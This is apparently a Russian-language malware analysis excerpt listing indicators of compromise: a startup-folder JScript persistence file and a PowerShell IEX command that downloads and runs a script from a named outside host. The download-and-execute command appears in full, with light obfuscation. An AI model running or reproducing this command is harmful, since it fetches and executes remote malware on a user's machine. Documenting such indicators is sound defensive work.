Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\c.js
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloAdsTrinG'('ht'+'tp://shantidhama.com/css/flip-box/d')
- http://sh###idhama.com/css/flip-box/d
- http://sh###idhama.com/css/flip-box/c
- DNS ASK sh###idhama.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloAdsTrinG'('ht'+'tp://shantidhama.com/css/flip-box/d')' (со скрытым окном)
- '<SYSTEM32>\wscript.exe' "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\c.js"